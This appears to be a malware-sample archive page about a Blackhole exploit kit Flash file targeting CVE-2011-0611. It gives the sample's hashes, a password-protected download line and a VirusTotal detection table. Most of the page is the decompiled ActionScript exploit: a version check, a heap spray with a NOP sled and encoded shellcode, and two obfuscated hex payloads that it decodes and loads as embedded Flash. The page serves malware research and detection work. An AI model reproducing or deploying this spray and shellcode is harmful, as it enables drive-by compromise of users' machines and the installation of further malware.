007 - Crime - Blackhole Flash CVE-2011-0611 SWF - Exploit - Web - Feb 2012

MD5:  196D309B7366F7507586CD162C8ED2C9

Download (pass infected) 



 Name  Blackhole Flash CVE-2011-0611_SWF
Category Crime
type exploit
vector  Web
Sample credit Mila
Date Feb 2012

ActionScript
//spray<br /> package <br /> {<br /> import flash.display.*;<br /> import flash.external.*;<br /> import flash.net.*;<br /> import flash.system.*;<br /> import flash.utils.*;<br /> <br /> public class spray extends flash.display.MovieClip<br /> {<br /> public function spray()<br /> {<br /> var loc10:*=0;<br /> var loc11:*=undefined;<br /> var loc12:*=undefined;<br /> var loc13:*=undefined;<br /> var loc14:*=undefined;<br /> var loc15:*=undefined;<br /> var loc16:*=undefined;<br /> var loc17:*=undefined;<br /> var loc18:*=null;<br /> var loc19:*=undefined;<br /> var loc20:*=undefined;<br /> var loc21:*=undefined;<br /> var loc22:*=undefined;<br /> var loc23:*=undefined;<br /> var loc24:*=undefined;<br /> var loc25:*=undefined;<br /> var loc26:*=undefined;<br /> var loc27:*=undefined;<br /> super();<br /> var loc1:*=null;<br /> var loc2:*=flash.system.Capabilities.version;<br /> var loc3:*=loc2.split(" ");<br /> var loc4:*=loc3[0];<br /> var loc5:*=loc3[1].split(",");<br /> var loc6:*=parseInt(loc5[0]);<br /> var loc7:*=parseInt(loc5[1]);<br /> var loc8:*=parseInt(loc5[2]);<br /> var loc9:*=parseInt(loc5[3]);<br /> if (loc6 == 10 && loc7 == 0 && loc8 > 40 || loc6 == 10 && loc7 > 0 && loc6 == 10 && loc7 < 2 || loc6 == 10 && loc7 == 2 && loc8 < 159 || loc6 == 10 && loc7 < 2) { loc10 = 0; loc11 = 1024; loc12 = 1048576; loc13 = 300; loc14 = new flash.utils.ByteArray(); loc15 = new flash.utils.ByteArray(); loc14.writeMultiByte(unescape("%u0c0c%u0c0c"), "utf-16"); loc15.writeMultiByte(unescape("%u9090%u9090%u16eb%u82b9%u0001%u8b00%u2434%uf789%u3e80%u74e9%uac06%u2734%ue2aa%uc3fa%ue5e8%uffff%uceff%u262b%u2727%ua679%u7bcb%u2726%uae27%uaac0%u3768%u48aa%u1673%u70fc%u7476%u7474%u7474%u7474%u7472%u4f74%u2623%u2727%u7172%u4f74%u4948%u2727%u524f%u4b55%u734a%ua94f%u2969%ucfcb%u276f%u2727%ucf77%u275b%u2727%uf7d8%ue3a4%u4f2f%uc868%u2268%ucf77%u274b%u2727%uf7d8%ue7a2%u3052%u734d%ud47e%u4f8d%ud955%u3194%u3acf%u2727%u7727%u76cf%u2727%ud827%u74f7%ud94d%uae4f%u2648%ucf9a%u272f%u2727%ucf77%u271b%u2727%uf7d8%u1647%u43e7%u77ac%uac17%u2b75%u75ac%uac33%u0f55%u3f9e%u2727%u1627%u16d8%u8be7%u461b%u255b%u070b%ue8e6%u262a%uc5e0%ua6d7%u7cd8%u6d9b%uac4d%u3765%u35ac%ufe52%u63ae%u3b03%ue446%uac47%u034b%uac03%u1b62%u73ac%u5f22%ucd26%u6dac%uac3f%u077d%ucc26%u13c4%uac6e%uac13%uc926%ud816%ue716%u8bdb%ue7a3%u2053%ue8e6%u262a%ucce0%u1cd3%u035b%u520f%uacc6%u037d%ucc26%uac41%u6c2b%u7dac%u263b%uaccc%uac23%ucf26%u63ae%u3b03%ue546%u272f%uc8cf%ud8d9%u4fd8%u5353%u1d57%u0808%u121e%u1509%u1616%u1409%u0912%u1f13%u5008%u5050%u4c08%u0956%u4f57%u1857%u1a4e%u1f16%u5301%u4c1a%u4c4c%u4c4c%u4c4c%u4c4c%u4c4c%u4c4c%u4c4c%u4c4c%u4c4c%u4c4c%u4c4c%u4c4c%u4c4c%u4c4c%u4c4c%u4c4c%u4c4c%u4c4c%u4c4c%u4c4c%u4c4c%u4c4c%u4c4c%u4c4c%u4c4c%u4c4c%u4c4c%u4c4c%u4c4c%u4c4c%u4c4c%u4c4c%u4c4c%u4c4c%u0027"), "utf-16"); loc16 = new flash.utils.ByteArray(); loc17 = new flash.utils.ByteArray(); allocs = new Array(); loc10 = 0; while (loc10 < loc13) { allocs.push(new flash.utils.ByteArray()); ++loc10; } loc16.length = loc11; loc16.position = 0; while (loc16.bytesAvailable > loc15.length) <br /> {<br /> loc16.writeBytes(loc14);<br /> }<br /> loc16.position = loc11 - loc15.length;<br /> loc16.writeBytes(loc15);<br /> loc17.length = loc12;<br /> loc17.position = 0;<br /> while (loc17.bytesAvailable >= loc11) <br /> {<br /> loc17.writeBytes(loc16);<br /> }<br /> loc10 = 0;<br /> while (loc10 < loc13) { allocs[loc10].writeBytes(loc17); ++loc10; } loc18 = null; loc21 = (loc20 = (loc19 = flash.system.Capabilities.version).split(" "))[0]; loc22 = loc20[1].split(","); loc23 = parseInt(loc22[0]); loc24 = parseInt(loc22[1]); loc25 = parseInt(loc22[2]); loc26 = parseInt(loc22[3]); if (loc23 == 10 && loc24 == 0 && loc25 > 40 || loc23 == 10 && loc24 > 0 && loc23 == 10 && loc24 < 2) { loc18 = "66E369A010FF0E54815095F21F1DF360956DE03FBC0FFAF91091CE39AFEC7CFBBAC73A8F38EA162FF6E095ED810EE562040AEE9047086ACF3BB47F1D6815791D6F545E56C82CCF50B06E337CF90AEAC727855C85F68CEC6CCF681365768CB5D93B7F2E2043CF50350F83390F41F40C3663F311888F1BEFB2430E62A377C440EE5332A1D32713BF1701EB4C368C86EB4C90D788366E320224EEF0673AD4FD8E448E82B2F68E72FB011299F1924972EE0A01BD78CD15F02822C6C9C2972B17E8D6193E1CE1F37B724D98E3F37B74886FA2F3E1EEE513520F3B25329D8A326D5D02AFDC3FBC176DD22176E2F8C1E002CF50300FE25EB9FE9BACBFDC6CEC58964D0E21A703764467A312E76F131D73B7BC5DBDB75DC8783A3E7DE1F8A33E1DDD4093407795417DC5A5A979F0D41C4B2EFEC1DCD517C25D4E37E31337DCEC8F9B3119EBE21F9206D5D5579509E7A98C39DB8F611F774E7771E756EBEDCFE86FAF645EABED8F8DDEF64AB6810AA7A56C3FE79461CB3373F94A5B1E99AD1DD616CB817C7A1B28C1B2576ED5697251E3EA367D7B11B68D601F247BB816AFBDEB917B6F23076412CF21F1D5DC6B05FF529EB8DEA75846E2BA67650E7F16539722B9C7FA4275C6FA7B901F7E1C04A1F4BE1A3679BA6AC8861FD364F866DF64F8296037651B7FBEB72A79FDDCA350D8B1A02FA761EE115D1A92D74C33B36F3A22563C078380BD7FAD41C3A16D82B9AF3661682EDE4D503EF5C809DCF37AA5FB111791E7E2C8791F718F17AAE20A89FB1588E10A6B49A149AD81F271AB3E0AF9D30443453CCFEF3647A7910FC772155A710772676198B6FDE581439795743665E83ADD4A112F3CDDB8F9846AC81F071BB848865B437620967FF5D48EDF7DBB96A05F5582C4A0B3D72D816F3666F53BBA55FE1EB98F53511BDBC3119DF72CCECFA86D04370A4F4D2A75B8CBB9CFE430C8EB63398CE3234F8DF20C7BADCFE86FFB22FCB7B5DFE7E29663B48FDFAF1BE88D273B1FD214340409DFAF03859A8DC12918FD5C4AD139456CF6FD00790BA2C6C31D44DC0A6846A9C887511B2AB108B58138A24D85AC6AB6902BBC7C40EBB18341E1D45D7196CED5B58067C6C75B47A287EC51AB4B16D51DC7D2437A280795260F09405E38B288EA8B85EBF92AE9B6F3A6ABADCB514CBDCD9BD4A7E92FF0CCD275A59952092151C1161BBCF40286B3CD89F862FB69D6960DDC84CDCE247F87447F95FC436E379499772F998A8B25DE1D1DDD5D1969CB2BA602DD0AF0381C8E1EBC0ADDD097D07B3F3241CC3FF8EE5C5EB8B8AC3F87F57604E00EAB2A67C05A9E8B76A6F060B1EA074E6EC1499B2566DC88D061FDA19A5547D4EA8C0749F97A65855AB2329C0DB07623A1EC4679E72042CC65CFB3BB71B383626197D9C9357AF694396597DE9C6B7194BB3AECC1ABDF31CC96AF483AB48217A1C2713CC21E9CDDB975C6010F3C8DA6988FC40ABA12A46094637267170A1E50B3AC9F7EA0EDB5350F83F338EBE366564C729848C9B7A0F25964C7EED488C47A96758FCD38E091523E476364E11A880ABDE334642FB5B5F1A8CC10747D9B5E9AC96C3F967E1B8C92AE2F33B61402ADBAD263C27AA8DC441307EC5ACE9093C271879C4813CB5B8C4BE932B2AF450748FCF5BD860673491DF4DCDD8B60EBABA2C613FC5D8BBFECCE33D2F79248AF995CDB02116B41263ADA188EB21202CACB7E5C03B86390130EC6274B1389AA1236833BC8BA15E0F3CC7A04B41ABCF5F2CC3C7DCC4EF01689D420466DD7AC42DCC52B68E9C3D5312E8CEFDB16230135A215969C57C06D5BA4268E590BFD945B4ABE6A64C69D4C711B5BC7CFD8091CD93560D51FE4DA438F2DF9F4B93DF438267FA33431853055527DC581F287B399C47E0C527D87663140EC036402BA239E6536E35653E9661C9A35F114ACC3D2EE9A3168D1199419D9A0870D8E244925EBAF811C1E3D0EBD202390CC2176CCAC1A5ACA993655E4992608AE239AC9093AE1EB00562A55542A3FCE3DCBF201318729E91E17028CFB994100E551C8BDE11BA0F1FB55BBFDFB5660749CA2903390AC2600EAFB7F9772673AD7EDE3BB55FF7749B75BF67F87720DAE186F968423C3A84499A32DE6923D77826D1D02B7E91BDA1B59947736EE4753A28C438CD4ED1A1DF4A555D292450B4F9A1547FA94791A0A5F27AC03CD17966A1B979A5146E36BECC3489C0A2039148EB2084171549BF0BCC630DE997C90FDAA6DAC921F04C96AE8B3D1C167351615C40CDB9D2B23CE9DE7EEDC48523A357CF2563AD1E7377FC618952E6ABFB84062F828E89D4769702EBE6A1944D046F076644E5F78B9ED6D8145EF8FE6BC1DABEC82666B65F19060EED16079F8E425E3500496570BF8E631BD97B7BD787B7B786B4D718BEB1CA04FA6BC4D48D30D1350D7A0547B179312B2DBA08D17E14D0D5D9E9388145BFFB922BC8BC9C8250C81758ABDEE8A395E34D1A2F322E95A567EB0A6A66D92DBCF807A43FE2B481310D95E383EB8CB907ABBAE39575642838B5AC0D85C73251C6C839FF889381080E12537ECD06F66099561915AD72E029919DB8A6530BF15CC0C4154119080847701EACAB6EE4A515DD19BAB2921356FFA430F0AF0032A5D3DC1C8122A18C50A8CE90A0DE90A8D5D603C32E1391EBEDA025748DE846FAE3568C66A13452C88AC4D387720320FD4FF268D787224F834045F4296651E2E36ED30D1C076083EC1A0ABA723047A6A98E662527E449246669DA2BF269688B6620F642E9580B5623E2501DBB164DD72849249AA41FF844A6D6CC25D979198468EE20F2255C5594B898283C4E4DF9B92F18E423F382F2D09BD5B46543DEB3D4E35561A9A4FC0BDB9749D9BC041CD413A94B4F1272902DCA20E4629B5396DCFBCDD3BC1CC4250E10E34B71860E744C6A98CA9780C3C4E12A9D59D9B60C945B81BD00118646404B934F5887B1B6391213AFCD9E384DF2BA1E4CC4ED505147A8F47E7037D165A24DEEA6350007C2A6614391A45BE014401369BC6FF421274242B02817376272B128F303526592F758141F6F560AB2FCC304303C04A06110D2FD0319E541C0DF321B704226669039CA3144D28C9EBF884EA21BC80D3B370A80B7D2DE61B2DD01A0068CA9A9184284F8E1468B115D214530C041D1D950C63490431E8BC37B3BA85E2665D2D3691B765DC8E64168D5C426FCD24A475C3EB073DCF2DCC69E4461AE607ABF5635373C36C42825920D5FC502CE7855BBCC1465638B852D9C147394BD0100779A935F627A3DD6D9B7C6D9A6661BC1442D758237B926BB9D66D2F78D6BF56EBAFE1BE454A186B0EB450DC29A3BF32F4F132C96017CABED3EB561C136B6E7AC7D255C7B3AC6AFDE8B0B8D8DD30E64D83BB19388A48AA6FB1713739AE1B1634030F0B64EAC5E627067973163AE5B26B8A55AE171B38534ADF36B955ECEF4A0023B6B9E1D4B1D0A03BC9ECBACDE03DF402B67C533D896F549C166E6631A5DD4DE2153A4BC286AC5DE3B0C032081BC9697FF1BD5659D0A82D81B67B9553FAD77E407E736303AF845CEDC444E4CA703E98C84754DD6738A5BD41B202C4C552A3FAC64B49674E9C899BC4D14F94F5C677EDCCF3CBB8E41A80470F757BE228D32BE38F9EFA10A53B0A46BA67E5EDAEA5A62FD6FC510C42C882B2537EAEE2AE6BF502114A2DA912C32FC477B5AA788329A0407EC1B9E4B977B549A20F8AD535296D4F57B7E848207057B8ADFA74356B3B1B37EC89316B689DBBD6E0325D4705737ED80A3F21AFD947B9D8E176301BFD510027ADCD67854A52CD7E18DC6750FCAE08248D02438C1374FD515980BBC81CA0F8CB1C938A578B2E2BAB633BF0E8B8FF0C270D7E80C5C906657EAAA14C3CEAEB0467B7CA893053A2455866CEE09D6E535FA57B06AAF0107C57BE1B05ADC03D68595BBF06B32EDBFA679D516058E4118793AA5961754B018C0D1CDCD16134A8DE452A62CD617124F8E8A575B8144FA9005DD963DD2B3C7E18BD3E18AB60285B0A7868816510F1E8CCA2CB1410FCE99127294A0D6C4AB468D5AA29E14A29FEA08701BC08523CC0820EFF480332C9042D4BC8B6BDFE89FC4E6E709275426F2AE88998FAC590955A5714D6DDA4D957D51E1A51E87C369A3CC2613BE4AE2C63AD144501276D0BE550FE690885953C67A9FCD167B8B7BA6501452ECBE505A2771CD666CD2C202C0C71E93B68E5DDAB5DA0AB0B8FD17A1568F781FDB20C01EEE7C83E3636D617FB0EF1441CA4C130FBED08F1EF28FAF176F6FD769DECC8DA4678C617A933937FDBDD340CF7BAD5DA2E7DB5DED731AFE125AFF534DE1ACD0C08798041A0770AD538D8D16429904EF8C27725A140B98115CE556BB3D1A8424C022118D08B08A4A6E4621153959BBCD14266B6575DB167BD8159AD870000E1F68035" + "7" + "5" + "3" + "4"; } else if (loc23 == 10 && loc24 == 2 && loc25 < 159 || loc23 == 10 && loc24 < 2) { loc18 = "0000000400AF070020992166!XXXX!039434!XXX!E90464F04337455D93BD86BF107269001100209921C4!XXXX!039434!XXX!005657E69647E6F6360056471644!XXXX!039434!XXX!00563716360200025!XXXX!039434!XXX!637163600864707564447567600372716654616F6C4005646!XXXX!039434!XXX!F6D44756370076E696E6E6572537940037968647000796C634569667F6D4974707D65456471656273600864716D40046C65696644787564!XXXX!039434!XXX!500473796C447E6F66447567600971644475676008647B2772777275!XXXX!039434!XXX!73733773777A70047E65647875447875645475676008647B2770477275737277777008637C!XXXX!039434!XXX!777277727573713867746740056A79!XXXX!039434!XXX!6354756760047C65716665646008637C777277727573713776686D6562576865746B66500E65766F5360056A79637004716D627F664478756!XXXX!039434!XXX!45005637163600471427168636005646F63427168634D6F!XXXX!039434!XXX!627660047145646F6342716863600864776E656C60076E69627473500E110428810440020D921E0F388C16670F388B19!XXXX!039434!XXX!E7000A06900F00020D926C451E45FC070005069EF4C002099C1800000001070D!XXXX!039434!XXX!4218DA4049012BF60D180C1800000001070111111010000000060B180B18001800000000010A180!XXXX!039434!XXX!5080E080000000107091805080E080000000107081805080E080000000107071805080E0800000001!XXXX!039434!XXX!07061805180418000000020703180000000107021801180000000001000476!XXXX!039434!XXX!9103E00209900000020D9065A9F3E6570A560C19A7000A0697125D4C1712500100020D926C426E3B53B70005069D4C1710!XXXX!039434!XXX!0C00020D926C4A4E75AAA7000506925D400D00020D926!XXXX!039434!XXX!C4E1D9DD3E70005069C1712500000020D9067818345B7087E7CBA47000A069D4C17125D4C17100B00020D926C4557BB06E7000506925D4C1000!XXXX!039434!XXX!00020D9068C280EC37073D7F13C7!XXXX!039434!XXX!000A069C325D4C100000020D9064CD0562C70B32FA9D37000A069C304C300000020D9063D9F78E570C260871A7000A06904000C002099F400000020D906FB6379397!XXXX!039434!XXX!0049C86C670!XXXX!039434!XXX!00A069712500A00020D926C4B79DFD817000506980801040000000001000906!XXXX!039434!XXX!900D10092200000000080E8018000206900700020D926C486C7527870005069C1D300700020D926C453C88!XXXX!039434!XXX!55870005069A0800000001070C080009069F4FF5700209950805080E!XXXX!039434!XXX!0800000001070F0805080E0800000001070D080A0800000001070C08000126900B00020D926C4F0F9EF3C7000506900830!XXXX!039434!XXX!02099E!XXXX!039434!XXX!4B080002069C1D3A08000000010709080808000B069C1D3712500500020D926C4575C558C70005069D4C17125D400000020D906DFCDDA1B70203225E47000A069C1F40000!XXXX!039434!XXX!0046707080007069C100000!XXXX!039434!XXX!!XXXX!039434!XXX!020D9064B2D3B0F70B4D2C4F07000A0690057002099C304608000000000105080009069E300400020D926C4A28380EA70005069!XXXX!039434!XXX!3040002069EF4F00209900000020D9068CEECF4F70731130B07000A06!XXXX!039434!XXX!9FF84002099408020400000001070104000B06900000020D9067D8FBD8F70827042707000A069009300209!XXXX!039434!XXX!971100010780500900020D926C444BF2852700050691040002069713000107800B00020D92!XXXX!039434!XXX!6C4F2891906700050697425308000206900000020D906FB1D50BB7004E2AF447000A0!XXXX!039434!XXX!69C10080000000107000706900A00020D926C480F635FF70005069B0000000307000506900310020D926C4B7950!XXXX!039434!XXX!AE870005069252080204000000010701040304000D0696225000!XXXX!039434!XXX!00020D9062DDC9B7F70D22364807000A069008B002099008E0020D92100000020D906E92B08227016D4F7DD7000A06984E4108020401!XXXX!039434!XXX!04000606971FF2A00209900800000000010!XXXX!039434!XXX!30000000001000D069005100209900000020D9065E9C30E670A163CF197000A069100010787!XXXX!039434!XXX!100000020D9061BED794170E41286BE7000A06910001078713!XXXX!039434!XXX!000107800C00020D92!XXXX!039434!XXX!6C4B00747617000506904009400209900000020D9!XXXX!039434!XXX!067B6BF37A7084940C857000A0691089002000A24000100047C657166656460011E81A0094008400740064005400440034002!XXXX!039434!XXX!40014009000518800810020D940C40020D921E031C73CBF7031C73C5!XXXX!039434!XXX!970005000C0690000507A30F30000000011!XXXX!039434!XXX!4400108100000AF00000F5500087000050CCA03575!XXXX!039434!XXX" + "!" + "6" + "4"; } else { loc18 = ""; } loc18 = this.str_replace(loc18, "!XXXX!03" + "9434!XXX" + "!", ""); loc18 = this.str_reverse(loc18); loc27 = new flash.display.Loader(); new flash.display.Loader().loadBytes(this.hex2bin(loc18)); this.addChild(loc27); return; } return; } public function str_reverse(arg1:String):String { var loc1:*=arg1.split(""); loc1.reverse(); var loc2:*=loc1.join(""); return loc2; } public function str_replace(arg1:String, arg2:String, arg3:String):String { return arg1.split(arg2).join(arg3); } public function hex2bin(arg1:String):flash.utils.ByteArray { var loc1:*=0; var loc2:*=0; var loc3:*=null; var loc4:*=new flash.utils.ByteArray(); while (loc1 < arg1.length) { loc3 = arg1.substr(loc1, 2); loc2 = parseInt(loc3, 16); loc4.writeByte(loc2); loc1 = loc1 + 2; } return loc4; } public function str_repeat(arg1:String, arg2:int):String { var loc1:*=null; var loc2:*=0; loc2 = 0; while (loc2 < arg2) { loc1 = loc1 + arg1; ++loc2; } return loc1; } internal static var allocs:Array; } }


VirustotalSHA256:     1581dc1e2cac90116a7f91bb8e68d44a7f4513369309c691f71f2d022d85e63a
SHA1:     5eae153d5ad6c0967b88bfc9efb7c535dca25ff1
MD5:     196d309b7366f7507586cd162c8ed2c9
File size:     7.0 KB ( 7124 bytes )
File name:     11519464962-9-4_1.x-shockwave-flash
File type:     Flash
Detection ratio:     10 / 43
Analysis date:     2012-03-06 13:23:20 UTC ( 15 hours, 56 minutes ago )
Antivirus     Result     Update
AhnLab-V3     -     20120305
AntiVir     EXP/CVE-2011-0611.FL     20120306
Antiy-AVL     -     20120305
Avast     SWF:Downloader-AK [Expl]     20120306
BitDefender     Script.SWF.Cxx     20120306
F-Secure     Script.SWF.Cxx     20120306
Fortinet     SWF/CVE20110611.fam!exploit     20120305
GData     Script.SWF.Cxx     20120306
Kaspersky     Exploit.SWF.CVE-2011-0611.be     20120305
McAfee-GW-Edition     -     20120304
Norman     HTML/Shellcode.AA     20120304
nProtect     Script.SWF.Cxx     20120306
Sophos     Troj/SWFExp-AI     20120306